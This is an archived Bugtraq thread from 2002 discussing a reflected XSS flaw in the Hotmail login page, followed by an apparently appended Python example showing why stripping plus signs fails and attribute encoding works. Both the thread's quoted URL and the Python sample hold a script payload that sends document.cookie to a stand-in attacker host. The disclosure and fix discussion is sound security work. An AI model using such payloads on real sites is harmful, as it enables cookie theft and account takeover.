Bugtraq mailing list archives

RE: XSS bug in hotmail login page


From: Russell Harding <hardingr () cunap com>
Date: Mon, 7 Oct 2002 23:50:38 -0700 (MST)

Hello, comments below:

On Mon, 7 Oct 2002, Thor Larholm wrote:

It's very simple, you can inject arbitrary scripting to be executed by the
user in the context of hotmail. This means that you can e.g. steal his
cookies or, if he's logged in, write emails from his account, delete his
mails and change his password.


  I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
from GET requests.  While you can view your own cookies easily, I'm not
sure if you can still exploit this bug.  I do know filtering these
characters prevents this sort of attack:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";><script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>&ct=1033054530&_setlang=

Is there another way to exploit this which I am not seeing? Or does MSN
actually have their act together (in this particular case...)?

       -Russell

P.S. Well, I suppose the real question may be this:
Is there a way to concatenate javascript strings without "+" or "%2B"?



On Mon, 7 Oct 2002, Thor Larholm wrote:

From: Peter Rdam [mailto:hell () weedmail com]
They didn't react, and I'm pretty curious about what
is possible with the bug. And I actually hope that
someone can tell me about it and maybe Microsoft will
do something about it.

It's very simple, you can inject arbitrary scripting to be executed by the
user in the context of hotmail. This means that you can e.g. steal his
cookies or, if he's logged in, write emails from his account, delete his
mails and change his password.



Regards
Thor Larholm
Jubii A/S - Internet Programmer
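The fix-side point of this exchange, as an added example that is not part of the thread: stripping `+` and `%2B` from the GET value, as Russell describes, does nothing about the `"`, `>` and `<` that actually break out of the reflected attribute, so a parser still sees a second element; encoding the value for the HTML attribute context closes that. The hidden-field template and the `attacker.invalid` host are assumptions (hypothetical, not Hotmail's real markup); the `cb` value is adapted from the URL quoted above.

```python
import html
from html.parser import HTMLParser

# Constructed sample, adapted from the login URL quoted in the thread; the
# exfiltration host is replaced by a placeholder.
PAYLOAD_CB = ('";><script>document.location.replace('
              "'http://attacker.invalid/steal?'+document.cookie);</script>")

# Assumed shape of a page reflecting cb into a hidden field (hypothetical).
TEMPLATE = '<input type="hidden" name="cb" value="{cb}">'


def strip_plus_filter(cb: str) -> str:
    """Mimic the filter described in the thread: drop '+' and '%2B'."""
    return cb.replace("%2B", "").replace("+", "")


def render_blacklist(cb: str) -> str:
    """Vulnerable: strip a few characters, then reflect the value raw."""
    return TEMPLATE.format(cb=strip_plus_filter(cb))


def render_encoded(cb: str) -> str:
    """Fixed: encode for the HTML attribute context instead of blacklisting."""
    return TEMPLATE.format(cb=html.escape(cb, quote=True))


class _TagCollector(HTMLParser):
    """Record every start tag a browser-like parser would create."""

    def __init__(self):
        super().__init__()
        self.tags = []  # list of (tag name, attrs dict)

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def reflected_tags(rendered: str):
    """Parse the rendered fragment and return its start tags."""
    p = _TagCollector()
    p.feed(rendered)
    p.close()
    return p.tags


def cb_survives_roundtrip(cb: str, renderer) -> bool:
    """True only if cb lands, character for character, in the single input's
    value attribute and no extra element (such as a script) is created."""
    tags = reflected_tags(renderer(cb))
    return len(tags) == 1 and tags[0][0] == "input" and tags[0][1].get("value") == cb
```

Run `cb_survives_roundtrip(PAYLOAD_CB, render_blacklist)` against `render_encoded` to see the blacklist version yield an `input` followed by a `script` element while the encoded version returns the value intact.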


